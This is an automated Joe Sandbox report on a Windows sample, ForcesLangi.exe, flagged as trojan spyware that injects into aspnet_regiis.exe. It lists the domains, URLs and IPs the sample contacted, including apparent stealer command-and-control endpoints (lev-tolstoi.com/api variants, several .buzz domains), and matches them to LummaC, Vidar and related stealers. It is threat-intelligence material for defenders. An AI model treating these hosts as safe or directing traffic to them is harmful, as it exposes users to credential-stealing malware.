https://lev-tolstoi.com/api_q | 100% | Avira URL Cloud | malware |
https://lev-tolstoi.com:443/apiB | 100% | Avira URL Cloud | malware |
https://appliacnesot.buzz:443/api | 100% | Avira URL Cloud | malware |
https://lev-tolstoi.com/apil | 100% | Avira URL Cloud | malware |
https://lev-tolstoi.com:443/apiZ | 100% | Avira URL Cloud | malware |
ingreem-eilish.biz | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
steamcommunity.com | 92.122.104.90 | true | false | | high
lev-tolstoi.com | 104.21.66.86 | true | false | | high
cashfuzysao.buzz | unknown | unknown | true | | unknown
scentniej.buzz | unknown | unknown | true | | unknown
inherineau.buzz | unknown | unknown | true | | unknown
prisonyfork.buzz | unknown | unknown | true | | unknown
ingreem-eilish.biz | unknown | unknown | true | | unknown
rebuildeso.buzz | unknown | unknown | true | | unknown
appliacnesot.buzz | unknown | unknown | true | | unknown
hummskitnj.buzz | unknown | unknown | true | | unknown
screwamusresz.buzz | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
scentniej.buzz | false | | high
https://steamcommunity.com/profiles/76561199724331900 | false | | high
rebuildeso.buzz | false | | high
appliacnesot.buzz | false | | high
screwamusresz.buzz | false | | high
cashfuzysao.buzz | false | | high
inherineau.buzz | false | | high
https://lev-tolstoi.com/api | false | | high
hummskitnj.buzz | false | | high
prisonyfork.buzz | false | | high
ingreem-eilish.biz | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png | aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/chrome_newtab | aspnet_regiis.exe, 00000002.00000003.1737561819.0000000004F39000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737482318.0000000004F3B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737762408.0000000004F39000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | aspnet_regiis.exe, 00000002.00000003.1737561819.0000000004F39000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737482318.0000000004F3B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737762408.0000000004F39000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp | aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://steamcommunity.com/?subsection=broadcasts | aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://store.steampowered.com/subscriber_agreement/ | aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.valvesoftware.com/legal.htm | aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en | aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback | aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6 | aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029FA000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl | aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis | aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC | aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRi | aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029FA000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1 | aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1736958147.0000000002A8C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029FA000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english& | aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en | aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://lev-tolstoi.com/ | aspnet_regiis.exe, 00000002.00000003.1736995992.0000000002A2E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1831852813.0000000002A2E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1894288105.0000000002A96000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1832238529.0000000002A31000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1894217197.0000000002A32000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://store.steampowered.com/privacy_agreement/ | aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1736958147.0000000002A8C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029FA000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://steamcommunity.com:443/profiles/76561199724331900 | aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029E4000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://steamcommunity.com/h | aspnet_regiis.exe, 00000002.00000003.1736995992.0000000002A2E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://store.steampowered.com/points/shop/ | aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | aspnet_regiis.exe, 00000002.00000003.1737561819.0000000004F39000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737482318.0000000004F3B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737762408.0000000004F39000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.rootca1.amazontrust.com/rootca1.crl0 | aspnet_regiis.exe, 00000002.00000003.1805624518.0000000004F2E000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://lev-tolstoi.com/api_q | aspnet_regiis.exe, 00000002.00000002.1894288105.0000000002A96000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://ocsp.rootca1.amazontrust.com0: | aspnet_regiis.exe, 00000002.00000003.1805624518.0000000004F2E000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 | aspnet_regiis.exe, 00000002.00000003.1738326326.0000000004F47000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1761739579.0000000004F47000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1738208675.0000000004F93000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1761459595.0000000004F47000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a | aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp | false | |
                                                                                                                high
                                                                                                                https://www.ecosia.org/newtab/aspnet_regiis.exe, 00000002.00000003.1737561819.0000000004F39000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737482318.0000000004F3B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737762408.0000000004F39000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://steamcommunity.com/profiles/76561199724331900/inventory/aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1736958147.0000000002A8C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-braspnet_regiis.exe, 00000002.00000003.1806743981.0000000005016000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://lev-tolstoi.com:443/apiZaspnet_regiis.exe, 00000002.00000002.1893702239.00000000029E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: malware
                                                                                                                      unknown
                                                                                                                      https://store.steampowered.com/privacy_agreement/aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=engaspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://prisonyfork.buzz:443/apiaspnet_regiis.exe, 00000002.00000002.1893702239.00000000029E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: malware
                                                                                                                          unknown
                                                                                                                          https://support.microsofaspnet_regiis.exe, 00000002.00000003.1738208675.0000000004F95000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&amaspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplesaspnet_regiis.exe, 00000002.00000003.1738326326.0000000004F22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://store.steampowered.com/about/aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://steamcommunity.com/my/wishlist/aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://help.steampowered.com/en/aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://steamcommunity.com/market/aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://store.steampowered.com/news/aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://lev-tolstoi.com/apiQ0O0qaspnet_regiis.exe, 00000002.00000003.1736995992.0000000002A2E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1831852813.0000000002A2E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866718018.0000000002A32000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1832238529.0000000002A31000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1894217197.0000000002A32000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                            unknown
                                                                                                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=aspnet_regiis.exe, 00000002.00000003.1737561819.0000000004F39000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737482318.0000000004F3B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737762408.0000000004F39000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://store.steampowered.com/subscriber_agreement/aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1736958147.0000000002A8C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgaspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1736958147.0000000002A8C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17aspnet_regiis.exe, 00000002.00000003.1738326326.0000000004F47000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1761739579.0000000004F47000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1738208675.0000000004F93000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1761459595.0000000004F47000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://lev-tolstoi.com/apilaspnet_regiis.exe, 00000002.00000003.1866718018.0000000002A32000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1894217197.0000000002A32000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                    unknown
                                                                                                                                                    https://steamcommunity.com/discussions/aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://store.steampowered.com/stats/aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&amaspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngaspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&aaspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://lev-tolstoi.com/?#aspnet_regiis.exe, 00000002.00000003.1736995992.0000000002A2E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1831852813.0000000002A2E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1832238529.0000000002A31000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                              unknown
                                                                                                                                                              https://store.steampowered.com/steam_refunds/aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://x1.c.lencr.org/0aspnet_regiis.exe, 00000002.00000003.1805624518.0000000004F2E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://x1.i.lencr.org/0aspnet_regiis.exe, 00000002.00000003.1805624518.0000000004F2E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Installaspnet_regiis.exe, 00000002.00000003.1738326326.0000000004F22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchaspnet_regiis.exe, 00000002.00000003.1737561819.0000000004F39000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737482318.0000000004F3B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737762408.0000000004F39000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&aaspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://lev-tolstoi.com:443/apiBaspnet_regiis.exe, 00000002.00000002.1893702239.00000000029E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                              unknown
                                                                                                                                                                              https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=easpnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://steamcommunity.com/workshop/aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://support.mozilla.org/products/firefoxgro.allaspnet_regiis.exe, 00000002.00000003.1806743981.0000000005016000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_caspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://store.steampowered.com/legal/aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1736958147.0000000002A8C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=enaspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=engaspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://lev-tolstoi.com/apiAaspnet_regiis.exe, 00000002.00000002.1894217197.0000000002A32000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                            unknown
                                                                                                                                                                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icoaspnet_regiis.exe, 00000002.00000003.1737561819.0000000004F39000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737482318.0000000004F3B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737762408.0000000004F39000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&aaspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=englaspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://store.steampowered.com/aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
Name | Source | Malicious | Antivirus Detection | Reputation
https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&l=e | aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png | aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg | aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029FA000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif | aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029FA000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ac.ecosia.org/autocomplete?q= | aspnet_regiis.exe, 00000002.00000003.1737561819.0000000004F39000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737482318.0000000004F3B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737762408.0000000004F39000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://appliacnesot.buzz:443/api | aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029E4000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://lev-tolstoi.com:443/api | aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029E4000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ | aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://lev-tolstoi.com:443/apipi | aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029E4000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://crt.rootca1.amazontrust.com/rootca1.cer0? | aspnet_regiis.exe, 00000002.00000003.1805624518.0000000004F2E000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp | aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://store.steampowered.com/account/cookiepreferences/ | aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1736958147.0000000002A8C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029FA000.00000004.00000020.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.66.86 | lev-tolstoi.com | United States | 13335 | CLOUDFLARENETUS | false
92.122.104.90 | steamcommunity.com | European Union | 16625 | AKAMAI-ASUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1581499
Start date and time: 2024-12-27 22:37:07 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 15s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: ForcesLangi.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@4/2@11/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 96%
• Number of executed functions: 36
• Number of non-executed functions: 107
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Excluded processes from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.63
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing disassembly code
• Report size getting too big, too many NtOpenKeyEx calls found
• Report size getting too big, too many NtProtectVirtualMemory calls found
• Report size getting too big, too many NtQueryValueKey calls found
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: ForcesLangi.exe
Time | Type | Description
16:37:55 | API Interceptor | 10x Sleep call for process: aspnet_regiis.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.21.66.86 | MV ROCKET_PDA.exe | malicious | FormBook | www.ayushigangwar.com/nqn4/?CJBlp=0Brh6Vr8UbBX&T2MpwT=59bmqUDXor7TXV4b71NCQ0d0nCVif23i1yH5+9ZmJc5hgCU7y+ZN9z0btTsWzGv6OrGw
92.122.104.90 | Leside-.exe | malicious | LummaC |
 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig |
 | UMrFwHyjUi.exe | malicious | Vidar |
 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc |
 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc |
 | SecuriteInfo.com.Win32.PWSX-gen.19404.14810.exe | malicious | LummaC |
 | http://sneamcomnnumnlty.com/fact/actual/get | malicious | Unknown |
 | https://u.to/xjPiIA | malicious | Unknown |
 | https://sueamcoommunnlty.com/geting/active | malicious | Unknown |
 | file.exe | malicious | LummaC, Vidar |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
lev-tolstoi.com | Leside-.exe | malicious | LummaC | 104.21.66.86
 | Vq50tK1Nx2.exe | malicious | LummaC | 104.21.66.86
 | IzDjbVdHha.exe | malicious | LummaC | 172.67.157.254
 | T4qO1i2Jav.exe | malicious | LummaC Stealer | 172.67.157.254
 | FXdg37pY22.exe | malicious | LummaC Stealer | 104.21.66.86
 | k0ukcEH.exe | malicious | LummaC | 172.67.157.254
 | pVbAZEFIpI.exe | malicious | LummaC | 172.67.157.254
 | GxX48twWHA.exe | malicious | LummaC | 104.21.66.86
 | ERTL09tA59.exe | malicious | LummaC | 104.21.66.86
 | MaZjv5XeQi.exe | malicious | LummaC | 104.21.66.86
steamcommunity.com | Leside-.exe | malicious | LummaC | 92.122.104.90
